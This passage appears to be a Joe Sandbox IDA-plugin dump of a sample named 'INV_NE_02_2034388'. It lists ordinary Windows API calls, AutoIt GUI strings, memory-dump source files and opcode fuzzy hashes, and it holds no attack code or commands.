                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Message$PeekTranslate$AcceleratorDispatch
                                          • String ID:
                                          • API String ID: 2108273632-0
                                          • Opcode ID: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                          • Instruction ID: 5e30e11b4a1e50e6093782a7c3f18569847dc725279de51faeef3c0bd44cbf51
                                          • Opcode Fuzzy Hash: a7c8caa960d18c36081a52289de371ede53fdfa9d0291adbc1963a0764221605
                                          • Instruction Fuzzy Hash: 0A31A731500646AFDB648F74CC44FAB7BA8AB02306F95017AEC11C3262E729A4CDDB5D
                                          APIs
                                          • GetWindowRect.USER32(?,?), ref: 00458A30
                                          • PostMessageW.USER32(?,00000201,00000001), ref: 00458ADA
                                          • Sleep.KERNEL32(00000000,?,00000201,00000001,?,?,?), ref: 00458AE2
                                          • PostMessageW.USER32(?,00000202,00000000), ref: 00458AF0
                                          • Sleep.KERNEL32(00000000,?,00000202,00000000,?,?,00000201,00000001,?,?,?), ref: 00458AF8
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessagePostSleep$RectWindow
                                          • String ID:
                                          • API String ID: 3382505437-0
                                          • Opcode ID: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                          • Instruction ID: 80642b6b9bd3aba6b5d9fb31be4e412888bcfd4668c130c4b2f9d35bc39c9ded
                                          • Opcode Fuzzy Hash: 0ca9fd056ca19cb6c90bb9abdc103f32fbac461099b2f563c45de53987908b56
                                          • Instruction Fuzzy Hash: 9831DF71500219EBDF14CFA8D94CA9E3BB5EB04316F10862EF924E72D2CBB49D18CB94
                                          APIs
                                          • IsWindowVisible.USER32(?), ref: 0045B204
                                          • SendMessageW.USER32(?,0000000E,00000000,00000000), ref: 0045B221
                                          • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 0045B259
                                          • CharUpperBuffW.USER32(00000000,00000000,?,?,?,?), ref: 0045B27F
                                          • _wcsstr.LIBCMT ref: 0045B289
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$BuffCharUpperVisibleWindow_wcsstr
                                          • String ID:
                                          • API String ID: 3902887630-0
                                          • Opcode ID: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                          • Instruction ID: 2c7352b259513f6215f8baf2ea9b1e154aa1926be373c141b5dda8785e83a564
                                          • Opcode Fuzzy Hash: 899d60c600cb03defd51949f250b9708d46bd725799c5b521baeadb23fec0c53
                                          • Instruction Fuzzy Hash: DF2103312042007BEB155B75AC09A7F7B98DB49711F10417EFC04DA262EF699C4597A8
                                          APIs
                                            • Part of subcall function 00402612: GetWindowLongW.USER32(?,000000EB), ref: 00402623
                                          • GetWindowLongW.USER32(?,000000F0), ref: 0048B192
                                          • SetWindowLongW.USER32(00000000,000000F0,00000001), ref: 0048B1B7
                                          • SetWindowLongW.USER32(00000000,000000EC,000000FF), ref: 0048B1CF
                                          • GetSystemMetrics.USER32(00000004), ref: 0048B1F8
                                          • SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000047,?,?,?,?,?,?,?,00470E90,00000000), ref: 0048B216
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Window$Long$MetricsSystem
                                          • String ID:
                                          • API String ID: 2294984445-0
                                          • Opcode ID: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                          • Instruction ID: a9241cd50f58f28df48e309b6b0d701528321bfcfd0e0dab973ca591f656860e
                                          • Opcode Fuzzy Hash: 4e73adee6138af7d1bf797c64f9d3d784d2b70968eee1b9af5d753c6da9745a2
                                          • Instruction Fuzzy Hash: D6218071910651AFCB10AF389C18A6F3BA4FB15361F144F3ABD32D72E0E73498618B98
                                          APIs
                                          • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00459320
                                            • Part of subcall function 00407BCC: _memmove.LIBCMT ref: 00407C06
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459352
                                          • __itow.LIBCMT ref: 0045936A
                                          • SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 00459392
                                          • __itow.LIBCMT ref: 004593A3
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: MessageSend$__itow$_memmove
                                          • String ID:
                                          • API String ID: 2983881199-0
                                          • Opcode ID: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                          • Instruction ID: 968ba8743040f36d453ad30986a6980fa4fc6e9bba4f502b0ab074d445a6e810
                                          • Opcode Fuzzy Hash: 84fe632702548fb1505fa491271f0483b598e009c5f2d7716c087cfb082072c1
                                          • Instruction Fuzzy Hash: 0821F831B00204FBDB10AA618C85EAE3BA8EF4C715F14403AFD04E72C2D6B89D49979A
                                          APIs
                                          • ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 0040134D
                                          • SelectObject.GDI32(?,00000000), ref: 0040135C
                                          • BeginPath.GDI32(?), ref: 00401373
                                          • SelectObject.GDI32(?,00000000), ref: 0040139C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ObjectSelect$BeginCreatePath
                                          • String ID:
                                          • API String ID: 3225163088-0
                                          • Opcode ID: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                          • Instruction ID: 345c33b4cc72e80acb91194012c3a0486190d93d7afc841094e42ad70741f55b
                                          • Opcode Fuzzy Hash: 6eee13c9652aa66c46a5bd740bf4bc56e64492aa972ec1549dd75ab418036029
                                          • Instruction Fuzzy Hash: 74215130800604DFEB10AF15DC04B6E7BA8FB00351F54463BF810A61F0D778A8A5DFA9
                                          APIs
                                          • GetCurrentThreadId.KERNEL32 ref: 00464ABA
                                          • __beginthreadex.LIBCMT ref: 00464AD8
                                          • MessageBoxW.USER32(?,?,?,?), ref: 00464AED
                                          • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 00464B03
                                          • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 00464B0A
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: CloseCurrentHandleMessageObjectSingleThreadWait__beginthreadex
                                          • String ID:
                                          • API String ID: 3824534824-0
                                          • Opcode ID: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                          • Instruction ID: dad7fb5640a7fc086676ad258fed45b246edcd9838203791acb142923f9e7505
                                          • Opcode Fuzzy Hash: 6202b558f3b2a9591e93c05a74b6ac6320d8986f7eb6685660a047ad8363ccb0
                                          • Instruction Fuzzy Hash: AC110876904214BBCB009FA8EC08E9F7FACEB85320F14427AF815D3350E679DD448BA9
                                          APIs
                                          • GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 0045821E
                                          • GetLastError.KERNEL32(?,00457CE2,?,?,?), ref: 00458228
                                          • GetProcessHeap.KERNEL32(00000008,?,?,00457CE2,?,?,?), ref: 00458237
                                          • HeapAlloc.KERNEL32(00000000,?,00457CE2,?,?,?), ref: 0045823E
                                          • GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00458255
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapObjectSecurityUser$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 842720411-0
                                          • Opcode ID: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                          • Instruction ID: ea2086197a74160409fd2b37e3cc6aadebf9925ef2750944b4d42ea2a50fea98
                                          • Opcode Fuzzy Hash: cfd5187f71e7f5cd8bdbe136946f039270b76956d2ef1bbe7b4a41513b9fedde
                                          • Instruction Fuzzy Hash: 5F012471200604AF9B204FA6DC88D6B7FACEF8A755B50097EF809D2220DE318C18CA64
                                          APIs
                                          • CLSIDFromProgID.OLE32(?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?,?,00457455), ref: 00457127
                                          • ProgIDFromCLSID.OLE32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457142
                                          • lstrcmpiW.KERNEL32(?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 00457150
                                          • CoTaskMemFree.OLE32(00000000,?,00000000,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?), ref: 00457160
                                          • CLSIDFromString.OLE32(?,?,?,?,00000000,?,00000000,?,?,-C0000018,00000001,?,00457044,80070057,?,?), ref: 0045716C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: From$Prog$FreeStringTasklstrcmpi
                                          • String ID:
                                          • API String ID: 3897988419-0
                                          • Opcode ID: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                          • Instruction ID: e33d562c89cd7b32e1c2ea0ad0b2255dbd3c00d864d4e8b233389f959c6fe991
                                          • Opcode Fuzzy Hash: 053515c948ca66986ad112422e3531eaba7e5432baa58b7069d320ef88250593
                                          • Instruction Fuzzy Hash: 9F01DF72600604BBCB105F68EC44BAE7BADEF44792F100079FD04D2321DB35DD088BA4
                                          APIs
                                          • QueryPerformanceCounter.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465260
                                          • QueryPerformanceFrequency.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 0046526E
                                          • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?), ref: 00465276
                                          • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 00465280
                                          • Sleep.KERNEL32(?,00000000,?,?,?,?,?,?,?,?,?,?), ref: 004652BC
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: PerformanceQuery$CounterSleep$Frequency
                                          • String ID:
                                          • API String ID: 2833360925-0
                                          • Opcode ID: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                          • Instruction ID: 4ceb344e541e682f07f906f107c4893f4acd0a9012da7968cf5d6b0cf31b4d70
                                          • Opcode Fuzzy Hash: f570a565f6e5a323919ec457eb30d6746b1d20e306601747cbf76f1b2f538e79
                                          • Instruction Fuzzy Hash: 89015B71D01A19DBCF00DFE4DC585EEBB78FB09711F4004AAE941F2240DB3459548BAA
                                          APIs
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),?,00000000,?), ref: 00458121
                                          • GetLastError.KERNEL32(?,TokenIntegrityLevel,?,00000000,?), ref: 0045812B
                                          • GetProcessHeap.KERNEL32(00000008,?,?,TokenIntegrityLevel,?,00000000,?), ref: 0045813A
                                          • HeapAlloc.KERNEL32(00000000,?,TokenIntegrityLevel,?,00000000,?), ref: 00458141
                                          • GetTokenInformation.ADVAPI32(?,00000003(TokenIntegrityLevel),00000000,?,?,?,TokenIntegrityLevel,?,00000000,?), ref: 00458157
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: HeapInformationToken$AllocErrorLastProcess
                                          • String ID:
                                          • API String ID: 44706859-0
                                          • Opcode ID: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                          • Instruction ID: c07733b115f7f4265118d5d6f8c893d5168d9180ec19ac620c451b64c6eb697f
                                          • Opcode Fuzzy Hash: 9a4f6c5eb7810c0e88419f6a8d5d9273e391a222e84c7421f05042c8608bd2e6
                                          • Instruction Fuzzy Hash: 71F0AF70200704AFEB110FA5EC88E6B3BACEF4A755B10043EF945D2250DF649C09DB64
                                          APIs
                                          • GetDlgItem.USER32(?,000003E9), ref: 0045C1F7
                                          • GetWindowTextW.USER32(00000000,?,00000100), ref: 0045C20E
                                          • MessageBeep.USER32(00000000), ref: 0045C226
                                          • KillTimer.USER32(?,0000040A), ref: 0045C242
                                          • EndDialog.USER32(?,00000001), ref: 0045C25C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                          • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                          • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: BeepDialogItemKillMessageTextTimerWindow
                                          • String ID:
                                          • API String ID: 3741023627-0
                                          • Opcode ID: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                          • Instruction ID: 1cbdf9da880a683b58ffeaf16326a4f2222d3a7c74a558aa9ab436c5b6b9af77
                                          • Opcode Fuzzy Hash: 4cc83a5054ee70337c3131b30a14a5b24bd9acd8f200e045765572ac389ab5c6
                                          • Instruction Fuzzy Hash: DF0167309047049BEB205B54DD8EB9A7778BB00706F000ABEB942A15E1DBF8699DDB59
                                          APIs
                                          • EndPath.GDI32(?), ref: 004013BF
                                          • StrokeAndFillPath.GDI32(?,?,0043B888,00000000,?), ref: 004013DB
                                          • SelectObject.GDI32(?,00000000), ref: 004013EE
                                          • DeleteObject.GDI32 ref: 00401401
                                          • StrokePath.GDI32(?), ref: 0040141C
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: Path$ObjectStroke$DeleteFillSelect
                                          • String ID:
                                          • API String ID: 2625713937-0
                                          • Opcode ID: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                          • Instruction ID: 52848d70ea624aaff4fbf1a8dc35ad1b05fe5f58837c3e038025b123c59b5ab6
                                          • Opcode Fuzzy Hash: e3422339a15b844a04c007a3cb2e97a240e6e454912aa1f685e9751c28b57a09
                                          • Instruction Fuzzy Hash: E9F01930000A08EFDB516F26EC4CB5D3BA4A741326F188639E829981F1CB3459A9DF28
                                          APIs
                                            • Part of subcall function 00420DB6: std::exception::exception.LIBCMT ref: 00420DEC
                                            • Part of subcall function 00420DB6: __CxxThrowException@8.LIBCMT ref: 00420E01
                                            • Part of subcall function 00407DE1: _memmove.LIBCMT ref: 00407E22
                                            • Part of subcall function 00407A51: _memmove.LIBCMT ref: 00407AAB
                                          • __swprintf.LIBCMT ref: 00412ECD
                                          Strings
                                          • \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs], xrefs: 00412D66
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: _memmove$Exception@8Throw__swprintfstd::exception::exception
                                          • String ID: \\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs]
                                          • API String ID: 1943609520-557222456
                                          • Opcode ID: e1bf6533362d961aa045ef11270170a0bc49c4ef3bb8348677819d21e8331e08
                                          • Instruction ID: 5fa1cbf72f49bdff47ddac1708762697048697bfe45d30711dc422f43ccdaf03
                                          • Opcode Fuzzy Hash: e1bf6533362d961aa045ef11270170a0bc49c4ef3bb8348677819d21e8331e08
                                          • Instruction Fuzzy Hash: AF91AD716083119FD714EF25D985CAFB7A8EF85314F00482FF441AB2A2DA78ED85CB5A
                                          APIs
                                          • OleSetContainedObject.OLE32(?,00000001), ref: 0045B4BE
                                          Memory Dump Source
                                          • Source File: 00000000.00000002.1339652329.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                           • Associated: 00000000.00000002.1339524488.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.000000000048F000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1339878725.00000000004B4000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340086596.00000000004BE000.00000004.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340139095.00000000004C7000.00000002.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340339097.0000000000526000.00000080.00000001.01000000.00000003.sdmp
                                           • Associated: 00000000.00000002.1340397918.000000000052D000.00000040.00000001.01000000.00000003.sdmp
                                          Joe Sandbox IDA Plugin
                                          • Snapshot File: hcaresult_0_2_400000_INV_NE_02_2034388.jbxd
                                          Similarity
                                          • API ID: ContainedObject
                                          • String ID: AutoIt3GUI$Container$%I
                                          • API String ID: 3565006973-4251005282
                                          • Opcode ID: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                          • Instruction ID: 7009c248d49ee490af6c5c3a89f60ad5612698b65dddc7868321d046ba5149c9
                                          • Opcode Fuzzy Hash: b0ef9ef2592e363b8beabdfb88cbb6824cc0f8258bc98d745d804ae61dd96c16
                                          • Instruction Fuzzy Hash: E6915B70200605AFDB14DF64C884B6ABBE5FF49705F20856EED46CB392EB74E845CBA4
                                          APIs
                                          • __startOneArgErrorHandling.LIBCMT ref: 004250AD
                                            • Part of subcall function 004300F0: __87except.LIBCMT ref: 0043012B
